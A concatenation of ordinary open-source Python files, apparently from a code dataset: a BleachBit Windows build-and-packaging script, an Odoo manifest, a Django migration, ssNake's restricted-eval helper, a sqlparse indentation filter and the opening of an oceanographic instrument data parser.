the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import absolute_import, print_function
import fnmatch
import glob
import imp
import logging
import os
import shutil
import subprocess
import sys
import time
import win_unicode_console
setup_encoding = sys.stdout.encoding
win_unicode_console.enable()
logger = logging.getLogger('setup_py2exe')
logger.setLevel(logging.INFO)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
"%(asctime)s - %(levelname)s - %(message)s", "%Y-%m-%d %H:%M:%S")
ch.setFormatter(formatter)
logger.addHandler(ch)
fast = False
if len(sys.argv) > 1 and sys.argv[1] == 'fast':
logger.info('Fast build')
fast = True
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
logger.info('ROOT_DIR ' + ROOT_DIR)
sys.path.append(ROOT_DIR)
BB_VER = None
GTK_DIR = sys.exec_prefix + '\\Lib\\site-packages\\gnome\\'
NSIS_EXE = 'C:\\Program Files (x86)\\NSIS\\makensis.exe'
NSIS_ALT_EXE = 'C:\\Program Files\\NSIS\\makensis.exe'
if not os.path.exists(NSIS_EXE) and os.path.exists(NSIS_ALT_EXE):
logger.info('NSIS found in alternate location: ' + NSIS_ALT_EXE)
NSIS_EXE = NSIS_ALT_EXE
SZ_EXE = 'C:\\Program Files\\7-Zip\\7z.exe'
# maximum compression with maximum compatibility
# mm=deflate method because deflate64 not widely supported
# mpass=passes for deflate encoder
# mfb=number of fast bytes
# bso0 bsp0 quiet output
# 7-Zip Command Line Reverence Wizard: https://axelstudios.github.io/7z/#!/
SZ_OPTS = '-tzip -mm=Deflate -mfb=258 -mpass=7 -bso0 -bsp0' # best compression
if fast:
# fast compression
SZ_OPTS = '-tzip -mx=1 -bso0 -bsp0'
UPX_EXE = ROOT_DIR + '\\upx\\upx.exe'
UPX_OPTS = '--best --crp-ms=999999 --nrv2e'
def archive(infile, outfile):
assert_exist(infile)
if os.path.exists(outfile):
logger.warning(
'Deleting output archive that already exists: ' + outfile)
os.remove(outfile)
cmd = '{} a {} {} {}'.format(SZ_EXE, SZ_OPTS, outfile, infile)
run_cmd(cmd)
assert_exist(outfile)
def recursive_glob(rootdir, patterns):
return [os.path.join(looproot, filename)
for looproot, _, filenames in os.walk(rootdir)
for filename in filenames
if any(fnmatch.fnmatch(filename, pattern) for pattern in patterns)]
def assert_exist(path, msg=None):
if not os.path.exists(path):
logger.error(path + ' not found')
if msg:
logger.error(msg)
sys.exit(1)
def check_exist(path, msg=None):
if not os.path.exists(path):
logger.warning(path + ' not found')
if msg:
logger.warning(msg)
time.sleep(5)
def assert_module(module):
try:
imp.find_module(module)
except ImportError:
logger.error('Failed to import ' + module)
logger.error('Process aborted because of error!')
sys.exit(1)
def assert_execute(args, expected_output):
"""Run a command and check it returns the expected output"""
actual_output = subprocess.check_output(args).decode(setup_encoding)
if -1 == actual_output.find(expected_output):
raise RuntimeError('When running command {} expected output {} but got {}'.format(
args, expected_output, actual_output))
def assert_execute_console():
"""Check the application starts"""
logger.info('Checking bleachbit_console.exe starts')
assert_execute([r'dist\bleachbit_console.exe', '--gui', '--exit', '--no-uac'],
'Success')
def run_cmd(cmd):
logger.info(cmd)
p = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
logger.info(stdout.decode(setup_encoding))
if stderr:
logger.error(stderr.decode(setup_encoding))
def sign_code(filename):
if os.path.exists('CodeSign.bat'):
logger.info('Signing code: %s' % filename)
cmd = 'CodeSign.bat %s' % filename
run_cmd(cmd)
else:
logger.warning('CodeSign.bat not available for %s' % filename)
def get_dir_size(start_path='.'):
# http://stackoverflow.com/questions/1392413/calculating-a-directory-size-using-python
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size
def copytree(src, dst):
# Microsoft xcopy is about twice as fast as shutil.copytree
logger.info('copying {} to {}'.format(src, dst))
cmd = 'xcopy {} {} /i /s /q'.format(src, dst)
os.system(cmd)
def count_size_improvement(func):
def wrapper():
import time
t0 = time.time()
size0 = get_dir_size('dist')
func()
size1 = get_dir_size('dist')
t1 = time.time()
logger.info('Reduced size of the dist directory by {:,} B from {:,} B to {:,} B in {:.1f} s'.format(
size0 - size1, size0, size1, t1 - t0))
return wrapper
def environment_check():
"""Check the build environment"""
logger.info('Checking for translations')
assert_exist('locale', 'run "make -C po local" to build translations')
logger.info('Checking for GTK')
assert_exist(GTK_DIR)
logger.info('Checking PyGI library')
assert_module('gi')
logger.info('Checking Python win32 library')
assert_module('win32file')
logger.info('Checking for CodeSign.bat')
check_exist('CodeSign.bat', 'Code signing is not available')
logger.info('Checking for NSIS')
check_exist(
NSIS_EXE, 'NSIS executable not found: will try to build portable BleachBit')
def build():
"""Build the application"""
logger.info('Deleting directories build and dist')
shutil.rmtree('build', ignore_errors=True)
shutil.rmtree('dist', ignore_errors=True)
shutil.rmtree('BleachBit-Portable', ignore_errors=True)
logger.info('Running py2exe')
shutil.copyfile('bleachbit.py', 'bleachbit_console.py')
cmd = sys.executable + ' -OO setup.py py2exe'
run_cmd(cmd)
assert_exist('dist\\bleachbit.exe')
assert_exist('dist\\bleachbit_console.exe')
os.remove('bleachbit_console.py')
if not os.path.exists('dist'):
os.makedirs('dist')
logger.info('Copying GTK files and icon')
copytree(GTK_DIR + '\\etc', 'dist\\etc')
copytree(GTK_DIR + '\\lib', 'dist\\lib')
for subpath in ['fontconfig', 'fonts', 'icons', 'themes']:
copytree(os.path.join(GTK_DIR, 'share', subpath),
'dist\\share\\' + subpath)
SCHEMAS_DIR = 'share\\glib-2.0\\schemas'
os.makedirs(os.path.join('dist', SCHEMAS_DIR))
shutil.copyfile(os.path.join(GTK_DIR, SCHEMAS_DIR, 'gschemas.compiled'),
os.path.join('dist', SCHEMAS_DIR, 'gschemas.compiled'))
shutil.copyfile('bleachbit.png', 'dist\\share\\bleachbit.png')
# for pop-up notification
shutil.copyfile('windows\\bleachbit.ico', 'dist\\share\\bleachbit.ico')
for dll in glob.glob1(GTK_DIR, '*.dll'):
shutil.copyfile(os.path.join(GTK_DIR, dll), 'dist\\'+dll)
os.mkdir('dist\\data')
shutil.copyfile('data\\app-menu.ui', 'dist\\data\\app-menu.ui')
logger.info('Copying themes')
copytree('themes', 'dist\\themes')
logger.info('Copying CA bundle')
import requests
shutil.copyfile(requests.utils.DEFAULT_CA_BUNDLE_PATH,
os.path.join('dist', 'cacert.pem'))
dist_locale_dir = r'dist\share\locale'
logger.info('Copying GTK localizations')
shutil.rmtree(dist_locale_dir, ignore_errors=True)
os.makedirs(dist_locale_dir)
locale_dir = os.path.join(GTK_DIR, 'share\\locale\\')
for f in recursive_glob(locale_dir, ['gtk30.mo']):
if not f.startswith(locale_dir):
continue
rel_f = f[len(locale_dir):]
os.makedirs(os.path.join(dist_locale_dir, os.path.dirname(rel_f)))
shutil.copyfile(f, os.path.join(dist_locale_dir, rel_f))
assert_exist(os.path.join(dist_locale_dir, r'es\LC_MESSAGES\gtk30.mo'))
logger.info('Copying BleachBit localizations')
copytree('locale', dist_locale_dir)
assert_exist(os.path.join(dist_locale_dir, r'es\LC_MESSAGES\bleachbit.mo'))
logger.info('Copying BleachBit cleaners')
if not os.path.exists('dist\\share\\cleaners'):
os.makedirs('dist\\share\\cleaners')
cleaners_files = recursive_glob('cleaners', ['*.xml'])
for file in cleaners_files:
shutil.copy(file, 'dist\\share\\cleaners')
logger.info('Checking for CleanerML')
assert_exist('dist\\share\\cleaners\\internet_explorer.xml')
logger.info('Copying license')
shutil.copy('COPYING', 'dist')
logger.info('Copying msvcr100.dll')
shutil.copy('C:\\WINDOWS\\system32\\msvcr100.dll', 'dist\\msvcr100.dll')
sign_code('dist\\bleachbit.exe')
sign_code('dist\\bleachbit_console.exe')
assert_execute_console()
@count_size_improvement
def delete_unnecessary():
logger.info('Deleting unnecessary files')
# Remove SVG to reduce space and avoid this error
# Error loading theme icon 'dialog-warning' for stock: Unable to load image-loading module: C:/PythonXY/Lib/site-packages/gtk-2.0/runtime/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-svg.dll: `C:/PythonXY/Lib/site-packages/gtk-2.0/runtime/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-svg.dll': The specified module could not be found.
# https://bugs.launchpad.net/bleachbit/+bug/1650907
delete_paths = [
r'_win32sysloader.pyd',
r'lib\gdk-pixbuf-2.0',
r'lib\gdbus-2.0',
r'perfmon.pyd',
r'servicemanager.pyd',
r'share\themes\default',
r'share\themes\emacs',
r'share\fontconfig',
r'share\icons\highcontrast',
r'share\themes',
r'win32evtlog.pyd',
r'win32pipe.pyd',
r'win32wnet.pyd',
]
for path in delete_paths:
path = r'dist\{}'.format(path)
if not os.path.exists(path):
logger.warning('Path does not exist: ' + path)
continue
if os.path.isdir(path):
this_dir_size = get_dir_size(path)
shutil.rmtree(path, ignore_errors=True)
logger.info('Deleting directory {} saved {:,} B'.format(
path, this_dir_size))
else:
logger.info('Deleting file {} saved {:,} B'.format(
path, os.path.getsize(path)))
os.remove(path)
@count_size_improvement
def delete_icons():
logger.info('Deleting unused PNG/SVG icons')
# This whitelist comes from analyze_process_monitor_events.py
icon_whitelist = [
'edit-clear-all.png',
'edit-delete.png',
'edit-find.png',
'list-add-symbolic.svg', # spin box in chaff dialog
'list-remove-symbolic.svg', # spin box in chaff dialog
'pan-down-symbolic.svg', # there is no pan-down.png
'pan-end-symbolic.svg', # there is no pan-end.png
'process-stop.png', # abort on toolbar
'window-close-symbolic.svg', # png does not get used
'window-maximize-symbolic.svg', # no png
'window-minimize-symbolic.svg', # no png
'window-restore-symbolic.svg' # no png
]
strip_list = recursive_glob(r'dist\share\icons', ['*.png', '*.svg'])
for f in strip_list:
if os.path.basename(f) not in icon_whitelist:
os.remove(f)
else:
logger.info('keeping whitelisted icon: %s', f)
def remove_empty_dirs(root):
"""Remove empty directories"""
import scandir
for entry in scandir.scandir(root):
if entry.is_dir():
remove_empty_dirs(entry.path)
if not os.listdir(entry.path):
logger.info('Deleting empty directory: %s' % entry.path)
os.rmdir(entry.path)
@count_size_improvement
def clean_translations():
"""Clean translations (localizations)"""
logger.info('Cleaning translations')
if os.path.exists(r'dist\share\locale\locale.alias'):
os.remove(r'dist\share\locale\locale.alias')
else:
logger.warning('locale.alias does not exist')
pygtk_translations = os.listdir('dist/share/locale')
supported_translations = [f[3:-3] for f in glob.glob('po/*.po')]
for pt in pygtk_translations:
if pt not in supported_translations:
path = 'dist/share/locale/' + pt
shutil.rmtree(path)
@count_size_improvement
def strip():
logger.info('Stripping executables')
strip_list = recursive_glob('dist', ['*.dll', '*.pyd'])
strip_whitelist = ['_sqlite3.dll']
strip_files_str = [f for f in strip_list if os.path.basename(
f) not in strip_whitelist]
# Process each file individually in case it is locked. See
# https://github.com/bleachbit/bleachbit/issues/690
for strip_file in strip_files_str:
if os.path.exists('strip.tmp'):
os.remove('strip.tmp')
if not os.path.exists(strip_file):
logger.error('%s does not exist before stripping', strip_file)
continue
cmd = 'strip.exe --strip-debug --discard-all --preserve-dates -o strip.tmp %s' % strip_file
run_cmd(cmd)
if not os.path.exists(strip_file):
logger.error('%s does not exist after stripping', strip_file)
continue
if not os.path.exists('strip.tmp'):
logger.warning('strip.tmp missing while processing %s', strip_file)
continue
error_counter = 0
while error_counter < 100:
try:
os.remove(strip_file)
except PermissionError:
logger.warning(
'permissions error while removing %s', strip_file)
time.sleep(.1)
error_counter += 1
else:
break
if error_counter > 1:
logger.warning('error counter %d while removing %s',
error_counter, strip_file)
if not os.path.exists(strip_file):
os.rename('strip.tmp', strip_file)
@count_size_improvement
def upx():
if fast:
logger.warning('Fast mode: Skipped executable with UPX')
return
if not os.path.exists(UPX_EXE):
logger.warning(
'UPX not found. To compress executables, install UPX to: ' + UPX_EXE)
return
logger.info('Compressing executables')
# Do not compress bleachbit.exe and bleachbit_console.exe to avoid false positives
# with antivirus software. Not much is space with gained with these small files, anyway.
upx_files = recursive_glob('dist', ['*.dll', '*.pyd'])
cmd = '{} {} {}'.format(UPX_EXE, UPX_OPTS, ' '.join(upx_files))
run_cmd(cmd)
@count_size_improvement
def delete_linux_only():
logger.info('Checking for Linux-only cleaners')
files = recursive_glob('dist/share/cleaners/', ['*.xml'])
for fn in files:
from bleachbit.CleanerML import CleanerML
cml = CleanerML(fn)
if not cml.get_cleaner().is_usable():
logger.warning('Deleting cleaner not usable on this OS: ' + fn)
os.remove(fn)
@count_size_improvement
def recompress_library():
"""Recompress library.zip"""
if fast:
logger.warning('Fast mode: Skipped recompression of library.zip')
return
if not os.path.exists(SZ_EXE):
logger.warning(SZ_EXE + ' does not exist')
return
logger.info('Recompressing library.zip with 7-Zip')
# extract library.zip
if not os.path.exists('dist\\library'):
os.makedirs('dist\\library')
cmd = SZ_EXE + ' x dist\\library.zip' + ' -odist\\library -y'
run_cmd(cmd)
file_size_old = os.path.getsize('dist\\library.zip')
os.remove('dist\\library.zip')
# clean unused modules from library.zip
delete_paths = ['distutils', 'plyer\\platforms\\android', 'plyer\\platforms\\ios', 'plyer\\platforms\\linux', 'plyer\\platforms\\macosx']
for p in delete_paths:
shutil.rmtree(os.path.join('dist', 'library', p))
# recompress library.zip
cmd = SZ_EXE + ' a {} ..\\library.zip'.format(SZ_OPTS)
logger.info(cmd)
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd='dist\\library')
stdout, stderr = p.communicate()
logger.info(stdout.decode(setup_encoding))
if stderr:
logger.error(stderr.decode(setup_encoding))
file_size_new = os.path.getsize('dist\\library.zip')
file_size_diff = file_size_old - file_size_new
logger.info('Recompression of library.dll reduced size by {:,} from {:,} to {:,}'.format(
file_size_diff, file_size_old, file_size_new))
shutil.rmtree('dist\\library', ignore_errors=True)
assert_exist('dist\\library.zip')
def shrink():
"""After building, run all the applicable size optimizations"""
delete_unnecessary()
delete_icons()
clean_translations()
remove_empty_dirs('dist')
try:
strip()
except Exception:
logger.exception(
'Error when running strip. Does your PATH have MINGW with binutils?')
if not fast:
upx()
assert_execute_console()
logger.info('Purging unnecessary GTK+ files')
# FIXME: move clean-dist into this program
cmd = sys.executable + ' setup.py clean-dist'
run_cmd(cmd)
delete_linux_only()
recompress_library()
# so calculate the size of the folder, as it is a goal to shrink it.
logger.info('Final size of the dist folder: {:,}'.format(
get_dir_size('dist')))
def package_portable():
"""Package the portable version"""
logger.info('Building portable')
copytree('dist', 'BleachBit-Portable')
with open("BleachBit-Portable\\BleachBit.ini", "w") as text_file:
text_file.write("[Portable]")
archive('BleachBit-Portable', 'BleachBit-{}-portable.zip'.format(BB_VER))
# NSIS
def nsis(opts, exe_name, nsi_path):
"""Run NSIS with the options to build exe_name"""
if os.path.exists(exe_name):
logger.info('Deleting old file: ' + exe_name)
os.remove(exe_name)
cmd = NSIS_EXE + \
' {} /DVERSION={} {}'.format(opts, BB_VER, nsi_path)
run_cmd(cmd)
assert_exist(exe_name)
sign_code(exe_name)
def package_installer(nsi_path=r'windows\bleachbit.nsi'):
"""Package the installer"""
if not os.path.exists(NSIS_EXE):
logger.warning('NSIS not found, so not building installer')
return
logger.info('Building installer')
exe_name = 'windows\\BleachBit-{0}-setup.exe'.format(BB_VER)
# Was:
#opts = '' if fast else '/X"SetCompressor /FINAL zlib"'
# Now: Done in NSIS file!
opts = '' if fast else '/V3 /Dpackhdr /DCompressor'
nsis(opts, exe_name, nsi_path)
if not fast:
# Was:
# nsis('/DNoTranslations',
# Now: Compression gets now done in NSIS file!
nsis('/V3 /DNoTranslations /Dpackhdr /DCompressor',
'windows\\BleachBit-{0}-setup-English.exe'.format(BB_VER),
nsi_path)
if os.path.exists(SZ_EXE):
logger.info('Zipping installer')
# Please note that the archive does not have the folder name
outfile = ROOT_DIR + \
'\\windows\\BleachBit-{0}-setup.zip'.format(BB_VER)
infile = ROOT_DIR + '\\windows\\BleachBit-{0}-setup.exe'.format(BB_VER)
archive(infile, outfile)
else:
logger.warning(SZ_EXE + ' does not exist')
if '__main__' == __name__:
logger.info('Getting BleachBit version')
import bleachbit
BB_VER = bleachbit.APP_VERSION
build_number = os.getenv('APPVEYOR_BUILD_NUMBER')
if build_number:
BB_VER = '%s.%s' % (BB_VER, build_number)
logger.info('BleachBit version ' + BB_VER)
environment_check()
build()
shrink()
package_portable()
package_installer()
# Clearly show the sizes of the files that end users download because the
# goal is to minimize them.
os.system(r'dir *.zip windows\*.exe windows\*.zip')
logger.info('Success!')
| tstenner/bleachbit | windows/setup_py2exe.py | Python | gpl-3.0 | 20,767 | 0.000626 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
{
"name": "Stock - Packaging information",
"version": "1.0",
"depends": [
"stock",
"product_packaging_through_attributes",
],
"author": "OdooMRP team,"
"AvanzOSC,"
"Serv. Tecnol. Avanzados - Pedro M. Baeza",
"website": "http://www.odoomrp.com",
"contributors": [
"Oihane Crucelaegui <oihanecrucelaegi@avanzosc.es>",
"Pedro M. Baeza <pedro.baeza@serviciosbaeza.com>",
"Ana Juaristi <ajuaristio@gmail.com>"
],
"category": "Custom Module",
"summary": "",
"data": [
"views/stock_view.xml",
],
"installable": True,
"auto_install": False,
}
| InakiZabala/odoomrp-wip | stock_packaging_info/__openerp__.py | Python | agpl-3.0 | 1,532 | 0 |
# pylint: disable=missing-module-docstring, missing-class-docstring
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hc_dpd', '0011_align_with_hc_20220301'),
]
operations = [
migrations.AlterField(
model_name='company',
name='company_name',
field=models.CharField(blank=True, max_length=80, null=True),
),
migrations.AlterField(
model_name='company',
name='street_name',
field=models.CharField(blank=True, max_length=80, null=True),
),
]
| studybuffalo/studybuffalo | study_buffalo/hc_dpd/migrations/0012_align_with_hc_20220301_2.py | Python | gpl-3.0 | 620 | 0 |
#!/usr/bin/env python3
# Copyright 2016 - 2021 Bas van Meerten and Wouter Franssen
# This file is part of ssNake.
#
# ssNake is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ssNake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ssNake. If not, see <http://www.gnu.org/licenses/>.
import re
import numpy as np
import scipy.special
import hypercomplex as hc
def safeEval(inp, length=None, Type='All', x=None):
"""
Creates a more restricted eval environment.
Note that this method is still not acceptable to process strings from untrusted sources.
Parameters
----------
inp : str
String to evaluate.
length : int or float, optional
The variable length will be set to this value.
By default the variable length is not set.
Type : {'All', 'FI', 'C'}, optional
Type of expected output. 'All' will return all types, 'FI' will return a float or int, and 'C' will return a complex number.
By default Type is set to 'All'
x : array_like, optional
The variable x is set to this variable,
By default the variable x is not used.
Returns
-------
Object
The result of the evaluated string.
"""
env = vars(np).copy()
env.update(vars(hc).copy())
env.update(vars(scipy.special).copy())
env.update(vars(scipy.integrate).copy())
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = {'None': None, 'False': False, 'True':True} # None
env["slice"] = slice
if length is not None:
env["length"] = length
if x is not None:
env["x"] = x
inp = re.sub('([0-9]+)[kK]', '\g<1>*1024', str(inp))
try:
val = eval(inp, env)
if isinstance(val, str):
return None
if Type == 'All':
return val
if Type == 'FI': #single float/int type
if isinstance(val, (float, int)) and not np.isnan(val) and not np.isinf(val):
return val
return None
if Type == 'C': #single complex number
if isinstance(val, (float, int, complex)) and not np.isnan(val) and not np.isinf(val):
return val
return None
except Exception:
return None
| smeerten/ssnake | src/safeEval.py | Python | gpl-3.0 | 2,736 | 0.00402 |
#
# Copyright (C) 2009-2020 the sqlparse authors and contributors
# <see AUTHORS file>
#
# This module is part of python-sqlparse and is released under
# the BSD License: https://opensource.org/licenses/BSD-3-Clause
from sqlparse import sql, tokens as T
from sqlparse.utils import offset, indent
class AlignedIndentFilter:
join_words = (r'((LEFT\s+|RIGHT\s+|FULL\s+)?'
r'(INNER\s+|OUTER\s+|STRAIGHT\s+)?|'
r'(CROSS\s+|NATURAL\s+)?)?JOIN\b')
by_words = r'(GROUP|ORDER)\s+BY\b'
split_words = ('FROM',
join_words, 'ON', by_words,
'WHERE', 'AND', 'OR',
'HAVING', 'LIMIT',
'UNION', 'VALUES',
'SET', 'BETWEEN', 'EXCEPT')
def __init__(self, char=' ', n='\n'):
self.n = n
self.offset = 0
self.indent = 0
self.char = char
self._max_kwd_len = len('select')
def nl(self, offset=1):
# offset = 1 represent a single space after SELECT
offset = -len(offset) if not isinstance(offset, int) else offset
# add two for the space and parenthesis
indent = self.indent * (2 + self._max_kwd_len)
return sql.Token(T.Whitespace, self.n + self.char * (
self._max_kwd_len + offset + indent + self.offset))
def _process_statement(self, tlist):
if len(tlist.tokens) > 0 and tlist.tokens[0].is_whitespace \
and self.indent == 0:
tlist.tokens.pop(0)
# process the main query body
self._process(sql.TokenList(tlist.tokens))
def _process_parenthesis(self, tlist):
# if this isn't a subquery, don't re-indent
_, token = tlist.token_next_by(m=(T.DML, 'SELECT'))
if token is not None:
with indent(self):
tlist.insert_after(tlist[0], self.nl('SELECT'))
# process the inside of the parenthesis
self._process_default(tlist)
# de-indent last parenthesis
tlist.insert_before(tlist[-1], self.nl())
def _process_identifierlist(self, tlist):
# columns being selected
identifiers = list(tlist.get_identifiers())
identifiers.pop(0)
[tlist.insert_before(token, self.nl()) for token in identifiers]
self._process_default(tlist)
def _process_case(self, tlist):
offset_ = len('case ') + len('when ')
cases = tlist.get_cases(skip_ws=True)
# align the end as well
end_token = tlist.token_next_by(m=(T.Keyword, 'END'))[1]
cases.append((None, [end_token]))
condition_width = [len(' '.join(map(str, cond))) if cond else 0
for cond, _ in cases]
max_cond_width = max(condition_width)
for i, (cond, value) in enumerate(cases):
# cond is None when 'else or end'
stmt = cond[0] if cond else value[0]
if i > 0:
tlist.insert_before(stmt, self.nl(offset_ - len(str(stmt))))
if cond:
ws = sql.Token(T.Whitespace, self.char * (
max_cond_width - condition_width[i]))
tlist.insert_after(cond[-1], ws)
def _next_token(self, tlist, idx=-1):
split_words = T.Keyword, self.split_words, True
tidx, token = tlist.token_next_by(m=split_words, idx=idx)
# treat "BETWEEN x and y" as a single statement
if token and token.normalized == 'BETWEEN':
tidx, token = self._next_token(tlist, tidx)
if token and token.normalized == 'AND':
tidx, token = self._next_token(tlist, tidx)
return tidx, token
def _split_kwds(self, tlist):
tidx, token = self._next_token(tlist)
while token:
# joins, group/order by are special case. only consider the first
# word as aligner
if (
token.match(T.Keyword, self.join_words, regex=True)
or token.match(T.Keyword, self.by_words, regex=True)
):
token_indent = token.value.split()[0]
else:
token_indent = str(token)
tlist.insert_before(token, self.nl(token_indent))
tidx += 1
tidx, token = self._next_token(tlist, tidx)
def _process_default(self, tlist):
self._split_kwds(tlist)
# process any sub-sub statements
for sgroup in tlist.get_sublists():
idx = tlist.token_index(sgroup)
pidx, prev_ = tlist.token_prev(idx)
# HACK: make "group/order by" work. Longer than max_len.
offset_ = 3 if (
prev_ and prev_.match(T.Keyword, self.by_words, regex=True)
) else 0
with offset(self, offset_):
self._process(sgroup)
def _process(self, tlist):
func_name = '_process_{cls}'.format(cls=type(tlist).__name__)
func = getattr(self, func_name.lower(), self._process_default)
func(tlist)
def process(self, stmt):
self._process(stmt)
return stmt
| andialbrecht/sqlparse | sqlparse/filters/aligned_indent.py | Python | bsd-3-clause | 5,110 | 0 |
#!/usr/bin/env python
"""
@package mi.dataset.parser.pco2a_a_dcl
@file marine-integrations/mi/dataset/parser/pco2a_a_dcl.py
@author Sung Ahn
@brief Parser for the pco2a_a_dcl dataset driver
This file contains code for the pco2a_a_dcl parser and code to produce data particles.
For instrument telemetered data, there is one driver which produces two(air/water) types of data particle.
For instrument recover data, there is one driver which produces two(air/water) types of data particle.
The input files and the content of the data particles are the same for both
instrument telemetered and instrument recovered.
Only the names of the output particle streams are different.
The input file is ASCII and contains 2 types of records.
Records are separated by a newline.
All records start with a timestamp.
Metadata records: timestamp [text] more text newline.
Sensor Data records: timestamp sensor_data newline.
Only sensor data records produce particles if properly formed.
Mal-formed sensor data records and all metadata records produce no particles.
Release notes:
Initial Release
"""
__author__ = 'Sung Ahn'
__license__ = 'Apache 2.0'
import re
from mi.core.log import get_logger
log = get_logger()
from mi.core.common import BaseEnum
from mi.dataset.parser.dcl_file_common import DclInstrumentDataParticle, \
DclFileCommonParser, TIMESTAMP, \
START_METADATA, END_METADATA, START_GROUP, END_GROUP
from mi.dataset.parser.common_regexes import END_OF_LINE_REGEX, SPACE_REGEX, \
FLOAT_REGEX, UNSIGNED_INT_REGEX, TIME_HR_MIN_SEC_REGEX, ANY_CHARS_REGEX
from mi.dataset.parser.utilities import timestamp_yyyy_mm_dd_hh_mm_ss_to_ntp
from mi.core.instrument.data_particle import DataParticleKey
# Basic patterns
UINT = '(' + UNSIGNED_INT_REGEX + ')' # unsigned integer as a group
FLOAT = '(' + FLOAT_REGEX + ')' # floating point as a captured group
W_CHAR = r'(W)'
A_CHAR = r'(A)'
COMMA = ','
SHARP = '#'
CHAR_M = ' *M'
EXTRA_CR = '\s*?' # account for random <CR> found in some live files.
# Timestamp at the start of each record: YYYY/MM/DD HH:MM:SS.mmm
# Metadata fields: [text] more text
# Sensor data has tab-delimited fields (date, time, integers)
# All records end with one of the newlines.
SENSOR_DATE = r'(\d{4}/\d{2}/\d{2})' # Sensor Date: MM/DD/YY
# Metadata record:
# Timestamp [Text]MoreText newline
METADATA_PATTERN = TIMESTAMP + SPACE_REGEX # dcl controller timestamp
METADATA_PATTERN += START_METADATA # Metadata record starts with '['
METADATA_PATTERN += ANY_CHARS_REGEX # followed by text
METADATA_PATTERN += END_METADATA # followed by ']'
METADATA_PATTERN += ANY_CHARS_REGEX # followed by more text
METADATA_PATTERN += END_OF_LINE_REGEX # metadata record ends with LF
METADATA_MATCHER = re.compile(METADATA_PATTERN)
# Sensor data record:
# Timestamp Date<space>Time<space>SensorData
# where SensorData are comma-separated unsigned integer numbers
SENSOR_DATA_PATTERN = TIMESTAMP + SPACE_REGEX # dcl controller timestamp
SENSOR_DATA_PATTERN += SHARP + START_GROUP + SENSOR_DATE + SPACE_REGEX # sensor date
SENSOR_DATA_PATTERN += TIME_HR_MIN_SEC_REGEX + END_GROUP + COMMA + CHAR_M + COMMA # sensor time
SENSOR_DATA_PATTERN += UINT + COMMA # measurement wavelength beta
SENSOR_DATA_PATTERN += UINT + COMMA # raw signal beta
SENSOR_DATA_PATTERN += FLOAT + COMMA # measurement wavelength chl
SENSOR_DATA_PATTERN += FLOAT + COMMA # raw signal chl
SENSOR_DATA_PATTERN += FLOAT + COMMA # measurement wavelength cdom
SENSOR_DATA_PATTERN += FLOAT + COMMA # raw signal cdom
SENSOR_DATA_PATTERN += UINT + COMMA # raw signal beta
SENSOR_DATA_PATTERN += FLOAT + COMMA # raw signal cdom
SENSOR_DATA_PATTERN += FLOAT + COMMA # raw signal cdom
SENSOR_DATA_PATTERN_AIR = SENSOR_DATA_PATTERN + A_CHAR + EXTRA_CR + END_OF_LINE_REGEX
SENSOR_DATA_MATCHER_AIR = re.compile(SENSOR_DATA_PATTERN_AIR)
SENSOR_DATA_PATTERN_WATER = SENSOR_DATA_PATTERN + W_CHAR + EXTRA_CR + END_OF_LINE_REGEX
SENSOR_DATA_MATCHER_WATER = re.compile(SENSOR_DATA_PATTERN_WATER)
# Manual test is below
# >>me = re.match(r"((\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2})\.(\d{3})) #((\d{4}/\d{2}/\d{2})
# (\d{2}):(\d{2}):(\d{2})), *M,(\d*),(\d*),(\d+.\d+),(\d+.\d+),(\d+.\d+),(\d+.\d+),(\d*),
# (\d+.\d+),(\d+.\d+),(\D)",
# "2014/08/10 00:20:24.274 #3765/07/27 01:00:11, M,43032,40423,397.04,40.1,21.221,
# 28.480,1026,39.9,40.4,W")
# >>> me.group()
# '2014/08/10 00:20:24.274 #3765/07/27 01:00:11, M,43032,40423,397.04,40.1,21.221,28.480,1026,39.9,40.4,W'
# SENSOR_DATA_MATCHER produces the following groups.
# The following are indices into groups() produced by SENSOR_DATA_MATCHER.
# i.e, match.groups()[INDEX]
SENSOR_GROUP_SENSOR_DATE_TIME = 8
SENSOR_GROUP_SENSOR_DATE = 9
SENSOR_GROUP_SENSOR_HOUR = 10
SENSOR_GROUP_SENSOR_MINUTE = 11
SENSOR_GROUP_SENSOR_SECOND = 12
SENSOR_GROUP_ZERO_A2D = 13
SENSOR_GROUP_CURRENT_A2D = 14
SENSOR_GROUP_CO2 = 15
SENSOR_GROUP_AVG_IRGA_TEMP = 16
SENSOR_GROUP_HUMIDITY = 17
